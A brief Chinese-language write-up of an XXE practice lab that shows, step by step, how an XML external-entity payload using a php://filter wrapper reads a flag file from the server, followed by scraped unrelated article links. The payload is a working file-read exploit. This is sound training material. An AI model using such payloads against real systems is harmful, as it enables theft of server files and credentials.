XXE-Lab靶场漏洞复现

1.尝试登录

输入账号admin/密码admin进行登录,并未有页面进行跳转

2.尝试抓包分析请求包数据

我们可以发现页面中存在xml请求,我们就可以构造我们的xml请求语句来获取想要的数据

3.构造语句

<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=c:/flag/flag">
]>
&xxe;

这里我们需要将xml语句放入post请求体中并发送

如上图所示便是我们需要获取的数据

4.数据解码

将获取的数据进行解码后我们即可得到我们的flag

flag{dmsioamdoiasdmdmwmdsmd}

相关推荐
Hui_Hong_TaiLang5 小时前
C#.NET使用multipart/form-data方式上传文件及其他数据
android·c#·.net
Patience to do5 小时前
安卓课设版算法计算器
android·jvm·算法
云计算老王6 小时前
MySQL 数据类型
android·mysql·adb
望佑7 小时前
Compose学习项目:生成随机数组
android
jiet_h7 小时前
Android Compose Modifier
android
火柴就是我8 小时前
compositionLocalOf 与 staticCompositionLocalOf 的简单理解与使用
android
drebander11 小时前
MySQL EXPLAIN 详解:一眼看懂查询计划
android·数据库·mysql
留白的云11 小时前
Android app反编译 攻与防
android·安全性测试
KpLn_HJL11 小时前
leetcode - 1530. Number of Good Leaf Nodes Pairs
android·java·leetcode